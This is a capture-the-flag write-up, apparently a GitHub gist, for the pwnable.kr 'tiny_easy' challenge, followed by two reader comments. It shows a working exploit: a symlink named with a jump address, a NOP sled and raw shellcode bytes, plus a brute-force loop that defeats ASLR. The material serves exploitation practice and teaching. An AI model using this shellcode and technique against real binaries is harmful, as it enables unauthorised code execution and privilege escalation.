Instantly share code, notes, and snippets.

@ihciah /README.MD
Last active Oct 25, 2017

Embed
What would you like to do?
Pwnable.kr tiny_easy writeup

Pwnable.kr tiny_easy writeup

ihciah@gmail.com

Run the program and it crashed. Load it with gdb-peda, break at entry point and run:

0x8048054:	pop    eax
0x8048055:	pop    edx
0x8048056:	mov    edx,DWORD PTR [edx]
0x8048058:	call   edx

So if the program is at /home/c/ctf/tiny_easy, the address being called is EDX: 0x6d6f682f ('/hom').

Try exec -a AAAA ./tiny_easy, the shell just exit and ssh connection is lost. In this case, we can add & to the end of the command, and then fg to switch to it. However it's too inconvenient. Here considering soft link. We can just link the name we want to the program, and we can run it with the original permission. Check the protection:

➜  ctf  ./checksec --file tiny_easy 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	FORTIFY	FORTIFIED FORTIFY-able  FILE
No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   No	0		0	tiny_easy

And the system ASLR is enabled.

Since the stack of the program is non-executable, and the library is static linked, we can jump to other stacks for example the environment and the parameters passed to program.

We can construct code like [address][NOP]*n[shellcode] and make a soft link. And then trying to execute it until we success.

mkdir /tmp/ihctiny
cd /tmp/ihctiny
ln -s /home/tiny_easy/tiny_easy `python -c "print '\x88\x88\x88\xff'+'\x90'*140+'\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3'"`
while true; do ./`python -c "print '\x88\x88\x88\xff'+'\x90'*140+'\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3'"`; done

Reference: http://www.secbox.cn/hacker/ctf/5547.html

@DhavalKapil

This comment has been minimized.

Copy link

DhavalKapil commented Jun 19, 2016

Nice writeup!

A tiny suggestion: Add shellcode in an environment variable instead of a file name. In that way, you will be able to add a very big NOP sled.

@shubhammatta

This comment has been minimized.

Copy link

shubhammatta commented Oct 25, 2017

I have a small doubt,
In [address][NOP]*n[shellcode] , how did you determine which value of address is to be used?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment